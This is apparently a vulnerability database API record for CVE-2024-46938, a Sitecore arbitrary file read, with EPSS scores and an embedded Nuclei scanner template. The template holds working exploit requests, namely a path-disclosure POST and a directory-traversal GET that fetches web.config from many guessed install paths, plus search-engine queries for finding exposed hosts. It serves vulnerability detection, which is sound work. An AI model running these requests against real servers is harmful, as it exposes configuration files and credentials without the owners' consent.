{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-46938/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-46938/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-46938/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-46938/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-46938/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-46938"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-46938"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.46767,
      "kev": false,
      "percentile": 0.98785
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-46938.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-46938\n\ninfo:\n  name: Sitecore Experience Platform <= 10.4 - Arbitrary File Read\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    An issue was discovered in Sitecore Experience Platform (XP), Experience Manager (XM), and Experience Commerce (XC) 8.0 Initial Release through 10.4 Initial Release. An unauthenticated attacker can read arbitrary files.\n  impact: |\n    Unauthenticated attackers can read arbitrary files from the Sitecore server, potentially exposing sensitive configuration and credentials.\n  remediation: |\n    Update Sitecore Experience Platform to a version that patches CVE-2024-46938.\n  reference:\n    - https://www.assetnote.io/resources/research/leveraging-an-order-of-operations-bug-to-achieve-rce-in-sitecore-8-x---10-x\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-46938\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2024-46938\n    epss-score: 0.46767\n    epss-percentile: 0.98785\n    cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 45\n    vendor: sitecore\n    product: experience_commerce\n    shodan-query: http.title:\"sitecore\"\n    fofa-query: title=\"sitecore\"\n    google-query: intitle:\"sitecore\"\n  tags: cve,cve2024,sitecore,lfi,rce,vkev,vuln\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/-/media/doo-doo.ashx\"\n\n    host-redirects: true\n    matchers:\n      - type: word\n        part: location\n        words:\n          - \"/sitecore/service/notfound.aspx\"\n        internal: true\n\n  - raw:\n      - |\n        POST /-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.ValidateXHtml?hdl=a HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        __PAGESTATE=/../../x/x\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Could not find a part of the path\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: file_path\n        group: 1\n        regex:\n          - Could not find a part of the path '([^']+)\\\\x\\\\x\\.txt\n        internal: true\n\n  - raw:\n      - |\n        GET /-/speak/v1/bundles/bundle.js?f={{paths}}sitecore\\shell\\client\\..\\..\\..\\web.config%23.js HTTP/1.1\n        Host: {{Hostname}}\n\n    payloads:\n      paths:\n        - '{{file_path}}\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore1\\'\n        - 'C:\\inetpub\\wwwroot\\sxa\\'\n        - 'C:\\inetpub\\wwwroot\\XP0.sc\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore82\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore81\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore81u2\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore7\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore8\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore70\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore71\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore72\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore75\\'\n        - 'C:\\Websites\\spe.dev.local\\'\n        - 'C:\\inetpub\\wwwroot\\SitecoreInstance\\'\n        - 'C:\\inetpub\\wwwroot\\SitecoreSPE_8\\'\n        - 'C:\\inetpub\\wwwroot\\SitecoreSPE_91\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore9\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore93sc.dev.local\\'\n        - 'C:\\inetpub\\wwwroot\\Sitecore81u3\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore9.sc\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore901xp0.sc\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore9-website\\'\n        - 'C:\\inetpub\\wwwroot\\sitecore93.sc\\'\n        - 'C:\\inetpub\\wwwroot\\'\n        - 'C:\\inetpub\\{{Hostname}}.sc\\'\n        - 'C:\\inetpub\\{{FQDN}}.sc\\'\n        - 'C:\\inetpub\\{{RDN}}.sc\\'\n        - 'C:\\inetpub\\{{FQDN}}\\'\n        - 'C:\\inetpub\\{{RDN}}\\'\n        - 'C:\\inetpub\\{{Hostname}}\\'\n        - 'C:\\inetpub\\{{Hostname}}.sitecore\\'\n        - 'C:\\inetpub\\{{FQDN}}.sitecore\\'\n        - 'C:\\inetpub\\{{RDN}}.sitecore\\'\n        - 'C:\\inetpub\\{{Hostname}}.website\\'\n        - 'C:\\inetpub\\{{FQDN}}.website\\'\n        - 'C:\\inetpub\\{{RDN}}.website\\'\n        - 'C:\\inetpub\\{{Hostname}}.dev.local\\'\n        - 'C:\\inetpub\\{{FQDN}}.dev.local\\'\n        - 'C:\\inetpub\\{{RDN}}.dev.local\\'\n        - 'C:\\inetpub\\{{Hostname}}sc.dev.local\\'\n        - 'C:\\inetpub\\{{FQDN}}sc.dev.local\\'\n        - 'C:\\inetpub\\{{RDN}}sc.dev.local\\'\n\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<configuration>\")'\n          - 'contains(content_type, \"text/javascript\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450220236b7edbe5480dff33b53c79942b13bf083ae373d3a02394ad73547287124ab6022100b818f84d09e5a4d590d8d58d8d03d9d2047723ad5787f700b1319ebfbdfee4c2:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-46938"
}